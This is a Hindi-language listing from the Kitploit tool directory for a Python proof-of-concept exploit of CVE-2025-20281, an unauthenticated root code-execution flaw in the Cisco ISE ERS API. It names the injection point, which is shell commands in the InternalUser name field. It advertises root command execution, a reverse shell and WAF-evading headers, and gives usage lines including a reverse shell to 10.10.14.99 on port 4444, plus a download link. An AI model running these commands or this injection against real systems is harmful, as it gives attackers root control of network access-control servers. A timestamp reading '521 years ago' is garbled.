Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Cisco-CVE-2025-20281-illdeed — Cisco ISE ERS API में CVE-2025-20281 के लिए अप्रमाणित रिमोट कोड निष्पादन शोषण। रूट के रूप में कमांड निष्पादित करें या रिवर्स शेल लॉन्च करें — कोई प्रमाणीकरण आवश्यक नहीं। | Kitploit
उपकरण/GitHubGitHub/ill-deed/cisco-cve-2025-20281-illdeed
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubill-deed/cisco-cve-2025-20281-illdeed

Cisco-CVE-2025-20281-illdeed

Cisco ISE ERS API में CVE-2025-20281 के लिए अप्रमाणित रिमोट कोड निष्पादन शोषण। रूट के रूप में कमांड निष्पादित करें या रिवर्स शेल लॉन्च करें — कोई प्रमाणीकरण आवश्यक नहीं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
521 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-20281 — Cisco ISE ERS API अप्रमाणित RCE शोषण

यह रिपॉजिटरी CVE-2025-20281 के लिए एक Python 3 प्रूफ-ऑफ-कॉन्सेप्ट शोषण है, जो Cisco Identity Services Engine (ISE) में एक गंभीर भेद्यता है जो ERS API के माध्यम से रूट के रूप में अप्रमाणित रिमोट कोड निष्पादन (RCE) की अनुमति देती है।


🩻 भेद्यता अवलोकन

Cisco ISE ERS का /ers/sdk#_ एंडपॉइंट उपयोगकर्ता निर्माण अनुरोधों को संसाधित करते समय प्रमाणीकरण को मान्य करने में विफल रहता है।
InternalUser ऑब्जेक्ट के name पैरामीटर में शेल कमांड इंजेक्ट करके, हमलावर रूट के रूप में कमांड निष्पादन प्राप्त कर सकते हैं।

  • CVE ID: CVE-2025-20281
  • प्रभावित: Cisco ISE PAN (Policy Admin Node) with ERS enabled
  • गंभीरता: Critical (CVSS 9.8)
  • प्रमाणीकरण: कोई आवश्यक नहीं

⚙️ विशेषताएँ

  • ✅ मनमाना कमांड चलाएं (--cmd)
  • ✅ --whoami के साथ त्वरित परीक्षण
  • ✅ रिवर्स शेल लॉन्च करें (--reverse)
  • ✅ कोई प्रमाणीकरण या सत्र टोकन आवश्यक नहीं
  • ✅ SSL चेतावनी दमन और स्वच्छ आउटपुट
  • ✅ सरल WAF को बायपास करने के लिए वैध हेडर्स

🚀 उपयोग

root@kitploit:~
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]

उदाहरण

Test command:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --whoami

Run custom command:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"

Reverse shell:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444

⚠️ कानूनी अस्वीकरण

यह कोड केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस सॉफ्टवेयर का उपयोग उन नेटवर्क या सिस्टम के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की अनुमति नहीं है।


🙏 श्रेय

भेद्यता: Cisco सलाहकार के माध्यम से खुलासा

PoC पुनर्लेखन: illdeed

टूल डाउनलोड करें